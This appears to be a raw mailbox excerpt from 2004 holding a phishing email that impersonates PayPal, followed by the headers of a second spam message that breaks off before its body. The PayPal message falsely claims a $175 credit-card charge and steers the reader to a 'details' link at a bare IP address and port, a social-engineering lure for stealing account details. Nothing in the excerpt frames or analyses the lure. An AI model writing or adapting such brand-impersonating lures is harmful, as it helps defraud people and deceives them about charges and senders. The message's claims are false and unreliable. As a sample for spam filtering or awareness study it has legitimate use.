From: exchange-robot@paypal.com
To: username@domain.com
Subject: Confirmation
Date: Mon, 13 Dec 2004 13:11:08 +0100
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_0001_01C4E115.358EF2A0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 42

This is a multi-part message in MIME format.

------=_NextPart_000_0001_01C4E115.358EF2A0
Content-Type: text/html;
	charset="iso-8859-2
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head>
 <meta http-equiv="content-type"
 content="text/html; charset=windows-1251">
</head>
<body text="#000000" bgcolor="#ffffcc" link="#000099"
 vlink="#990099"
 alink="#000099">

<p><i>Congratulations! PayPal has successfully charged $175 to your credit
card. Your order tracking number is A866DEC0, and your item will be shipped
within three business days. </i></p>
<p><i>To see details please click this <a href=3D"http://10.4.1.12:1639/index.htm"><b>link</b></a>.
</i></p>
<p><i>DO NOT REPLY TO THIS MESSAGE VIA EMAIL! This email is being sent by
an automated message system and the reply will not be received. </i></p>

<p><i>Thank you for using PayPal.</i></p>
</body>
</html>





------=_NextPart_000_0001_01C4E115.358EF2A0--


From ciobouxyha@netvisao.pt  Mon Dec 13 15:35:16 2004
Return-Path: <ciobouxyha@netvisao.pt>
X-Original-To: username@login.domain.com
Delivered-To: username@login.domain.com
Received: from mail1.domain.com (mail1.domain.com [10.23.1.4])
	by spanky.domain.com (Postfix) with ESMTP id 63AD5536F6F
	for <username@login.domain.com>; Mon, 13 Dec 2004 15:35:16 -0500 (EST)
Received: from spam.thegeekempire.net (dsl093-012-142.cle1.dsl.speakeasy.net [66.93.12.142])
	by mail1.domain.com (Postfix) with ESMTP id 5393585A63D
	for <username@domain.com>; Mon, 13 Dec 2004 15:34:27 -0500 (EST)
Received: from av-217-129-142-108.netvisao.pt (av-217-129-142-108.netvisao.pt [217.129.142.108] (may be forged))
	by spam.thegeekempire.net (8.10.1/8.9.3) with SMTP id iBDL1IR30677;
	Mon, 13 Dec 2004 16:01:19 -0500 (EST)
Received: from spam.thegeekempire.net by av-217-129-142-108.netvisao.pt with HTTP; Mon, 13 Dec 2004 13:20:15 -0600
Received: from relay.netvisao.pt by av-217-129-142-108.netvisao.pt with SMTP id 9252759; Mon, 13 Dec 2004 13:18:54 -0600
Mime-Version: 1.0
Subject: The bookkeeper Vassily Stepanovich
Content-Transfer-Encoding: 7bit
To: "Dodd" <rslfyjp@netvisao.pt>
Content-Type: text/plain;
	charset="WINDOWS-1256";
Date: Mon, 13 Dec 2004 13:18:39 -0600
